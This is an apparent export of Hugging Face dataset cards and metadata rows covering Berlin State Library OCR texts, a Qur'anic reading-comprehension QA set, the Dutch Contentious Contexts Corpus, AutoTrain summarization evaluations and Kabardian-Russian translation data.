### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{labusch_kai_2019_3257041,
author = {Labusch, Kai and
Zellhöfer, David},
title = {{OCR fulltexts of the Digital Collections of the
Berlin State Library (DC-SBB)}},
month = jun,
year = 2019,
publisher = {Zenodo},
version = {1.0},
doi = {10.5281/zenodo.3257041},
url = {https://doi.org/10.5281/zenodo.3257041}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/berlin_state_library_ocr | [
"task_categories:fill-mask",
"task_categories:text-generation",
"task_ids:masked-language-modeling",
"task_ids:language-modeling",
"annotations_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1M<n<10M",
"language:de",
"language:nl",
"language:en",
"language:fr",
"language:es",
"license:cc-by-4.0",
"ocr",
"library",
"region:us"
] | 2022-07-26T18:40:02+00:00 | {"annotations_creators": ["machine-generated"], "language_creators": ["expert-generated"], "language": ["de", "nl", "en", "fr", "es"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1M<n<10M"], "source_datasets": [], "task_categories": ["fill-mask", "text-generation"], "task_ids": ["masked-language-modeling", "language-modeling"], "pretty_name": "Berlin State Library OCR", "tags": ["ocr", "library"]} | 2022-08-05T08:36:24+00:00 |
88b10b40e3197c83f2995771e057515f584ecd27 |
# Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://sites.google.com/view/quran-qa-2022/home
- **Repository:** https://gitlab.com/bigirqu/quranqa/-/tree/main/
- **Paper:** https://dl.acm.org/doi/10.1145/3400396
- **Leaderboard:**
- **Point of Contact:** @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
Whereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
### Languages
Qur'anic Arabic
## Dataset Structure
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
```json
{
"pq_id": "38:41-44_105",
"passage": "واذكر عبدنا أيوب إذ نادى ربه أني مسني الشيطان بنصب وعذاب. اركض برجلك هذا مغتسل بارد وشراب. ووهبنا له أهله ومثلهم معهم رحمة منا وذكرى لأولي الألباب. وخذ بيدك ضغثا فاضرب به ولا تحنث إنا وجدناه صابرا نعم العبد إنه أواب.",
"surah": 38,
"verses": "41-44",
"question": "من هو النبي المعروف بالصبر؟",
"answers": [
{
"text": "أيوب",
"start_char": 12
}
]
}
```
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* `pq_id`: Sample ID
* `passage`: Context text
* `surah`: Surah number
* `verses`: Verse range
* `question`: Question text
* `answers`: List of answers and their start character
### Data Splits
| **Dataset** | **%** | **# Question-Passage Pairs** | **# Question-Passage-Answer Triplets** |
|-------------|:-----:|:-----------------------------:|:---------------------------------------:|
| Training | 65% | 710 | 861 |
| Development | 10% | 109 | 128 |
| Test | 25% | 274 | 348 |
| All | 100% | 1,093 | 1,337 |
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License https://creativecommons.org/licenses/by-nd/4.0/legalcode
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to https://creativecommons.org/licenses/by-nd/4.0/
### Citation Information
```
@article{malhas2020ayatec,
author = {Malhas, Rana and Elsayed, Tamer},
title = {AyaTEC: Building a Reusable Verse-Based Test Collection for Arabic Question Answering on the Holy Qur’an},
year = {2020},
issue_date = {November 2020},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {19},
number = {6},
issn = {2375-4699},
url = {https://doi.org/10.1145/3400396},
doi = {10.1145/3400396},
journal = {ACM Trans. Asian Low-Resour. Lang. Inf. Process.},
month = {oct},
articleno = {78},
numpages = {21},
keywords = {evaluation, Classical Arabic}
}
```
### Contributions
Thanks to [@piraka9011](https://github.com/piraka9011) for adding this dataset.
| tarteel-ai/quranqa | [
"task_categories:question-answering",
"task_ids:extractive-qa",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:n<1K",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"license:cc-by-nd-4.0",
"quran",
"qa",
"region:us"
] | 2022-07-26T19:05:10+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["ar"], "license": ["cc-by-nd-4.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K", "1K<n<10K"], "source_datasets": ["original"], "task_categories": ["question-answering"], "task_ids": ["extractive-qa"], "pretty_name": "Qur'anic Reading Comprehension Dataset", "tags": ["quran", "qa"]} | 2022-07-27T01:28:31+00:00 |
e7d4f3001b1c33740f10caa51c61cd4199e831e0 |
DallData is a non-exhaustive look into DALL-E Mega(1)'s unconditional image generation. This is under the [BirdL-AirL License.](https://huggingface.co/spaces/BirdL/license/)
(1)
```bibtext
@misc{Dayma_DALL·E_Mini_2021,
author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata},
doi = {10.5281/zenodo.5146400},
month = {7},
title = {DALL·E Mini},
url = {https://github.com/borisdayma/dalle-mini},
year = {2021}
}
``` | BirdL/DallData | [
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-07-26T19:48:02+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Latent Space Mapping", "tags": []} | 2022-09-28T20:12:02+00:00 |
794edc666ccae9f296d033a99a826a3f41f34385 | # Dataset Card for Contentious Contexts Corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-instances)
- [Data Splits](#data-instances)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Repository:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Paper:** [N/A]
- **Leaderboard:** [N/A]
- **Point of Contact:** [Jacco van Ossenbruggen](https://github.com/jrvosse)
**Note** One can also find a Datasheet produced by the creators of this dataset as a [PDF document](https://github.com/cultural-ai/ConConCor/blob/main/Dataset/DataSheet.pdf)
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is `nl`
## Dataset Structure
### Data Instances
```
{
'extract_id': 'H97',
'text': 'en waardoor het eerste doel wordt voorbijgestreefd om voor den 5D5c5Y 5d-5@5j5g5d5e5Z5V5V5c een speciale eigen werkingssfeer te
scheppen.Intusschen is het',
'target': '5D 5c5Y5d-5@5j5g5d5e5Z5V5V5c',
'annotator_responses_english': [
{'id': 'unknown_2a', 'response': 'Not contentious'},
{'id': 'unknown_2b', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2c', 'response': "I don't know"},
{'id': 'unknown_2d', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2e', 'response': 'Not contentious'},
{'id': 'unknown_2f', 'response': "I don't know"},
{'id': 'unknown_2g', 'response': 'Not contentious'}],
'annotator_responses_dutch': [
{'id': 'unknown_2a', 'response': 'Niet omstreden'},
{'id': 'unknown_2b', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2c', 'response': 'Weet ik niet'},
{'id': 'unknown_2d', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2e', 'response': 'Niet omstreden'},
{'id': 'unknown_2f', 'response': 'Weet ik niet'},
{'id': 'unknown_2g', 'response': 'Niet omstreden'}],
'annotator_suggestions': [
{'id': 'unknown_2a', 'suggestion': ''},
{'id': 'unknown_2b', 'suggestion': 'ander ras nodig'},
{'id': 'unknown_2c', 'suggestion': 'personen van ander ras'},
{'id': 'unknown_2d', 'suggestion': ''},
{'id': 'unknown_2e', 'suggestion': ''},
{'id': 'unknown_2f', 'suggestion': ''},
{'id': 'unknown_2g', 'suggestion': 'ras'}]
}
```
### Data Fields
|extract_id|text|target|annotator_responses_english|annotator_responses_dutch|annotator_suggestions|
|---|---|---|---|---|---|
|Unique identifier|Text|Target phrase or word|Response(translated to English)|Response in Dutch|Suggestions, if present|
### Data Splits
Train: 2720
## Dataset Creation
### Curation Rationale
> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
### Source Data
#### Initial Data Collection and Normalization
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
> - 'Omstreden'(Contentious)
> - 'Niet omstreden'(Not contentious)
> - 'Weet ik niet'(I don't know)
> - 'Onleesbare OCR'(Illegible OCR)</br>
2 open fields
> - 'Andere omstreden termen in de context'(Other contentious terms in the context)
> - 'Notities'(Notes)</br>
and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> - The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> - The context window of 5 sentences per sample was found optimal;
> - The number of samples per annotator was increased to 50;
> - The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> - The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> - The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> - Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
## Considerations for Using the Data
## Accessing the annotations
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with `Illegible OCR`:
```python
from collections import Counter
def calculate_ocr_score(example):
annotator_responses = [response['response'] for response in example['annotator_responses_english']]
counts = Counter(annotator_responses)
bad_ocr_ratings = counts.get("Illegible OCR")
if bad_ocr_ratings is None:
bad_ocr_ratings = 0
return round(1 - bad_ocr_ratings/len(annotator_responses),3)
dataset = dataset.map(lambda example: {"ocr_score":calculate_ocr_score(example)})
```
To take the majority vote (or return a tie) based on whether a example is labelled contentious or not:
```python
def most_common_vote(example):
annotator_responses = [response['response'] for response in example['annotator_responses_english']]
counts = Counter(annotator_responses)
contentious_count = counts.get("Contentious according to current standards")
if not contentious_count:
contentious_count = 0
not_contentious_count = counts.get("Not contentious")
if not not_contentious_count:
not_contentious_count = 0
if contentious_count > not_contentious_count:
return "contentious"
if contentious_count < not_contentious_count:
return "not_contentious"
if contentious_count == not_contentious_count:
return "tied"
```
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time
### Discussion of Biases
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
[Cultural AI](https://github.com/cultural-ai)
### Licensing Information
CC-BY
### Citation Information
```
@misc{ContentiousContextsCorpus2021,
author = {Cultural AI},
title = {Contentious Contexts Corpus},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\\url{https://github.com/cultural-ai/ConConCor}},
}
``` | biglam/contentious_contexts | [
"task_categories:text-classification",
"task_ids:sentiment-scoring",
"task_ids:multi-label-classification",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"language_creators:machine-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:nl",
"license:cc-by-2.0",
"newspapers",
"historic",
"dutch",
"problematic",
"ConConCor",
"region:us"
] | 2022-07-26T21:07:48+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language_creators": ["machine-generated"], "language": ["nl"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["sentiment-scoring", "multi-label-classification"], "pretty_name": "Contentious Contexts Corpus", "tags": ["newspapers", "historic", "dutch", "problematic", "ConConCor"]} | 2022-08-01T16:02:11+00:00 |
cde011e595294d34ae7c648fcf788b153e762256 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-9ce97676-11915596 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:53:03+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:35:44+00:00 |
9ed5cb6a383d487c045f685388b32a12a5ad17c6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-3fbf83bf-11925597 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:57:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:57:02+00:00 |
eb61a0f6ad839a5ba5cd3f33da10732bd79a8d56 | anzorq/kbd-ru | [
"task_categories:translation",
"task_categories:text2text-generation",
"language:kbd",
"language:ru",
"license:mit",
"translation",
"text2text-generation",
"region:us"
] | 2022-07-27T01:07:25+00:00 | {"language": ["kbd", "ru"], "license": "mit", "task_categories": ["translation", "text2text-generation"], "pretty_name": "Circassian (Kabardian) - Russian sentence pairs", "tags": ["translation", "text2text-generation"]} | 2023-07-20T01:34:30+00:00 |
|
7103492b78e16adacd7b2a3216f524265ae3d70c | anzorq/kbd_lat-ru | [
"task_categories:translation",
"task_categories:text2text-generation",
"multilinguality:multilingual",
"source_datasets:original",
"language:kbd",
"language:ru",
"license:mit",
"translation",
"region:us"
] | 2022-07-27T02:27:22+00:00 | {"language": ["kbd", "ru"], "license": ["mit"], "multilinguality": ["multilingual"], "source_datasets": ["original"], "task_categories": ["translation", "text2text-generation"], "task_ids": ["translation", "text2text-generation"], "pretty_name": "Kbd Ru Translation", "tags": ["translation"]} | 2022-07-31T01:04:38+00:00 |
|
0342260156e61cc56a6f59314d0d5b036b985a39 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-18299d18-11955600 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:49:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/led-base-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T09:17:44+00:00 |
3ab156a12e3f1fecc0271712a0709c4ff979715f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-a6bd4aa5-11965601 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:50:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T20:10:35+00:00 |
643d3b34887839055d1a1d41cee511eb2baaac31 | hong/FLO | [
"license:afl-3.0",
"region:us"
] | 2022-07-27T03:05:59+00:00 | {"license": "afl-3.0"} | 2022-07-27T03:05:59+00:00 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.